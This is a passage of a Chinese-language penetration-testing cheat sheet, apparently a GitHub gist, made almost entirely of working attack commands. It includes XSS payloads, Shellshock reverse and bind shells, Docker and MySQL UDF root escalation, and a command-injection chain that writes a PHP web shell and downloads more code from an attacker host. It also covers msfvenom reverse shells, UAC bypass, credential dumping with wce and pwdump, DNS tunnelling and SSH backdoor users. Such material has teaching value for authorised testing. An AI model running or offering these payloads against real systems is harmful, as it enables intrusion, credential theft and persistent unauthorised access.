SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;> <IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041> <IMG SRC="jav ascript:alert('XSS');"> perl -e 'print "<IMG SRC=javascript:alert(\"XSS\")>";' > out <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> (">< iframes http://google.com < iframes >) <BODY BACKGROUND="javascript:alert('XSS')"> <FRAMESET><FRAME SRC=”javascript:alert('XSS');"></FRAMESET> "><script >alert(document.cookie)</script> %253cscript%253ealert(document.cookie)%253c/script%253e "><s"%2b"cript>alert(document.cookie)</script> %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E <img src=asdf onerror=alert(document.cookie)> SSH Over SCTP (使用 Socat) # 远端服务器 # 假设你准备让 SCTP socket 监听端口 80/SCTP 并且 sshd 端口在 22/TCP $ socat SCTP-LISTEN:80,fork TCP:localhost:22 # 本地端 # 将 SERVER_IP 换成远端服务器的地址,然后将 80 换成 SCTP 监听的端口号 $ socat TCP-LISTEN:1337,fork SCTP:SERVER_IP:80 # 创建 socks 代理 # 替换 username 和 -p 的端口号 $ ssh -lusername localhost -D 8080 -p 1337 使用洋葱网络 # 安装服务 $ apt-get install tor torsocks # 绑定 ssh 到 tor 服务端口 80 # /etc/tor/torrc SocksPolicy accept 127.0.0.1 SocksPolicy accept 192.168.0.0/16 Log notice file /var/log/tor/notices.log RunAsDaemon 1 HiddenServiceDir /var/lib/tor/ssh_hidden_service/ HiddenServicePort 80 127.0.0.1:22 PublishServerDescriptor 0 $ /etc/init.d/tor start $ cat /var/lib/tor/ssh_hidden_service/hostname 3l5zstvt1zk5jhl662.onion # ssh 客户端连接 $ apt-get install torsocks $ torsocks ssh login@3l5zstvt1zk5jhl662.onion -p 80 Metagoofil – 元数据收集工具 注:Metagoofil 是一款利用Google收集信息的工具。 # http://www.edge-security.com/metagoofil.php # 它可以自动在搜素引擎中检索和分析文件,还具有提供Mac地址,用户名列表等其他功能 $ python metagoofil.py -d example.com -t doc,pdf -l 200 -n 50 -o examplefiles -f results.html 利用 Shellshock # 一个发现并利用服务器 Shellshock 的工具 # https://github.com/nccgroup/shocker $ ./shocker.py -H 192.168.56.118 --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose # 查看文件 $ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80 # 绑定 shell $ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80 # 反弹 Shell $ nc -l -p 443 $ echo "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.56.103 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80 获取 Docker 的 Root # 获取 Docker 的 Root # user 必须在 docker 用户组中 ek@victum:~/docker-test$ id uid=1001(ek) gid=1001(ek) groups=1001(ek),114(docker) ek@victum:~$ mkdir docker-test ek@victum:~$ cd docker-test ek@victum:~$ cat > Dockerfile FROM debian:wheezy ENV WORKDIR /stuff RUN mkdir -p $WORKDIR VOLUME [ $WORKDIR ] WORKDIR $WORKDIR << EOF ek@victum:~$ docker build -t my-docker-image . ek@victum:~$ docker run -v $PWD:/stuff -t my-docker-image /bin/sh -c \ 'cp /bin/sh /stuff && chown root.root /stuff/sh && chmod a+s /stuff/sh' ./sh whoami # root ek@victum:~$ docker run -v /etc:/stuff -t my-docker-image /bin/sh -c 'cat /stuff/shadow' 使用 DNS 隧道绕过防火墙 # 让数据和命令使用 DNS 隧道传输以绕过防火墙的检查 # dnscat2 支持从目标主机上面上传和下载命令来获取文件、数据和程序 # 服务器 (攻击者) $ apt-get update $ apt-get -y install ruby-dev git make g++ $ gem install bundler $ git clone https://github.com/iagox86/dnscat2.git $ cd dnscat2/server $ bundle install $ ruby ./dnscat2.rb dnscat2> New session established: 16059 dnscat2> session -i 16059 # 客户机 (目标) # https://downloads.skullsecurity.org/dnscat2/ # https://github.com/lukebaggett/dnscat2-powershell $ dnscat --host <dnscat server_ip> 编译 Assemble 代码 $ nasm -f elf32 simple32.asm -o simple32.o $ ld -m elf_i386 simple32.o simple32 $ nasm -f elf64 simple.asm -o simple.o $ ld simple.o -o simple 使用非交互 Shell 打入内网 # 生成 shell 使用的 ssh 密钥 $ wget -O - -q "http://domain.tk/sh.php?cmd=whoami" $ wget -O - -q "http://domain.tk/sh.php?cmd=ssh-keygen -f /tmp/id_rsa -N \"\" " $ wget -O - -q "http://domain.tk/sh.php?cmd=cat /tmp/id_rsa" # 增加用户 tempuser $ useradd -m tempuser $ mkdir /home/tempuser/.ssh && chmod 700 /home/tempuser/.ssh $ wget -O - -q "http://domain.tk/sh.php?cmd=cat /tmp/id_rsa" > /home/tempuser/.ssh/authorized_keys $ chmod 700 /home/tempuser/.ssh/authorized_keys $ chown -R tempuser:tempuser /home/tempuser/.ssh # 反弹 ssh shell $ wget -O - -q "http://domain.tk/sh.php?cmd=ssh -i /tmp/id_rsa -o StrictHostKeyChecking=no -R 127.0.0.1:8080:192.168.20.13:8080 -N -f tempuser@<attacker_ip>" 利用 POST 远程命令执行获取 Shell attacker:~$ curl -i -s -k -X 'POST' --data-binary $'IP=%3Bwhoami&submit=submit' 'http://victum.tk/command.php' attacker:~$ curl -i -s -k -X 'POST' --data-binary $'IP=%3Becho+%27%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3B+%3F%3E%27+%3E+..%2Fshell.php&submit=submit' 'http://victum.tk/command.php' attacker:~$ curl http://victum.tk/shell.php?cmd=id # 在服务器上下载 shell (phpshell.php) http://victum.tk/shell.php?cmd=php%20-r%20%27file_put_contents%28%22phpshell.php%22,%20fopen%28%22http://attacker.tk/phpshell.txt%22,%20%27r%27%29%29;%27 # 运行 nc 并执行 phpshell.php attacker:~$ nc -nvlp 1337 以管理员身份在 Win7 上反弹具有系统权限的 Shell msfvenom –p windows/shell_reverse_tcp LHOST=192.168.56.102 –f exe > danger.exe # 显示账户配置 net user <login> # Kali 上下载 psexec https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx # 使用 powershell 脚本上传 psexec.exe 到目标机器 echo $client = New-Object System.Net.WebClient > script.ps1 echo $targetlocation = "http://192.168.56.102/PsExec.exe" >> script.ps1 echo $client.DownloadFile($targetlocation,"psexec.exe") >> script.ps1 powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1 # 使用 powershell 脚本上传 danger.exe 到目标机器 echo $client = New-Object System.Net.WebClient > script2.ps1 echo $targetlocation = "http://192.168.56.102/danger.exe" >> script2.ps1 echo $client.DownloadFile($targetlocation,"danger.exe") >> script2.ps1 powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script2.ps1 # 使用预编译的二进制文件绕过 UAC: https://github.com/hfiref0x/UACME # 使用 powershell 脚本上传 https://github.com/hfiref0x/UACME/blob/master/Compiled/Akagi64.exe 到目标机器 echo $client = New-Object System.Net.WebClient > script2.ps1 echo $targetlocation = "http://192.168.56.102/Akagi64.exe" >> script3.ps1 echo $client.DownloadFile($targetlocation,"Akagi64.exe") >> script3.ps1 powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script3.ps1 # 在 Kali 上创建监听 nc -lvp 4444 # 以系统权限使用 Akagi64 运行 danger.exe Akagi64.exe 1 C:\Users\User\Desktop\danger.exe # 在 Kali 上创建监听 nc -lvp 4444 # 下一步就会反弹给我们一个提过权的 shell # 以系统权限使用 PsExec 运行 danger.exe psexec.exe –i –d –accepteula –s danger.exe 以普通用户身份在 Win7 上反弹具有系统权限的 Shell https://technet.microsoft.com/en-us/security/bulletin/dn602597.aspx #ms15-051 https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html https://www.exploit-db.com/exploits/37049/ # 查找目标机器是否安装了补丁,输入如下命令 wmic qfe get wmic qfe | find "3057191" # 上传编译后的利用程序并运行它 https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe # 默认情况下其会以系统权限执行 cmd.exe,但我们需要改变源代码以运行我们上传的 danger.exe # https://github.com/hfiref0x/CVE-2015-1701 下载它并定位到 "main.c" # 使用 wce.exe 获取已登录用户的明文账号密码 http://www.ampliasecurity.com/research/windows-credentials-editor/ wce -w # 使用 pwdump7 获取其他用户的密码哈希值 http://www.heise.de/download/pwdump.html # we can try online hash cracking tools such crackstation.net MS08-067 – 不使用 Metasploit $ nmap -v -p 139, 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.31.205 $ searchsploit ms08-067 $ python /usr/share/exploitdb/platforms/windows/remote/7132.py 192.168.31.205 1 通过 MySQL Root 账户实现提权 # Mysql Server version: 5.5.44-0ubuntu0.14.04.1 (Ubuntu) $ wget 0xdeadbeef.info/exploits/raptor_udf2.c $ gcc -g -c raptor_udf2.c $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc mysql -u root -p mysql> use mysql; mysql> create table foo(line blob); mysql> insert into foo values(load_file('/home/user/raptor_udf2.so')); mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so'; mysql> create function do_system returns integer soname 'raptor_udf2.so'; mysql> select * from mysql.func; mysql> select do_system('echo "root:passwd" | chpasswd > /tmp/out; chown user:user /tmp/out'); user:~$ su - Password: user:~# whoami root root:~# id uid=0(root) gid=0(root) groups=0(root) 使用 LD_PRELOAD 注入程序 $ wget https://github.com/jivoi/pentest/ldpreload_shell.c $ gcc -shared -fPIC ldpreload_shell.c -o ldpreload_shell.so $ sudo -u user LD_PRELOAD=/tmp/ldpreload_shell.so /usr/local/bin/somesoft 针对 OpenSSH 用户进行枚举时序攻击 注:枚举时序攻击(“Enumeration Timing Attack”)属于侧信道攻击/旁路攻击(Side Channel Attack),侧信道攻击是指利用信道外的信息,比如加解密的速度/加解密时芯片引脚的电压/密文传输的流量和途径等进行攻击的方式,一个词形容就是“旁敲侧击”。–参考自 shotgun 在知乎上的解释。 osueta 是一个用于对 OpenSSH 进行时序攻击的 python2 脚本,其可以利用时序攻击枚举 OpenSSH 用户名,并在一定条件下可以对 OpenSSH 服务器进行 DOS 攻击。 # https://github.com/c0r3dump3d/osueta $ ./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes $ ./osueta.py -H 192.168.10.22 -p 22 -d 15 -v yes –dos no -L userfile.txt 使用 ReDuh 构造合法的 HTTP 请求以建立 TCP 通道 注: ReDuh 是一个通过 HTTP 协议建立隧道传输各种其他数据的工具。其可以把内网服务器的端口通过 http/https 隧道转发到本机,形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。 对了亲~ReDuh-Gui 号称端口转发神器哦。 # https://github.com/sensepost/reDuh # 步骤 1 # 上传 reDuh.jsp 目标服务器 $ http://192.168.10.50/uploads/reDuh.jsp # 步骤 2 # 在本机运行 reDuhClient $ java -jar reDuhClient.jar http://192.168.10.50/uploads/reDuh.jsp # 步骤 3 # 使用 nc 连接管理端口 $ nc -nvv 127.0.0.1 1010 # 步骤 4 # 使用隧道转发本地端口到远程目标端口 [createTunnel] 7777:172.16.0.4:3389 # 步骤 5 # 使用 RDP 连接远程 $ /usr/bin/rdesktop -g 1024x768 -P -z -x l -k en-us -r sound:off localhost:7777
Chuanjian Wang
revised
this gist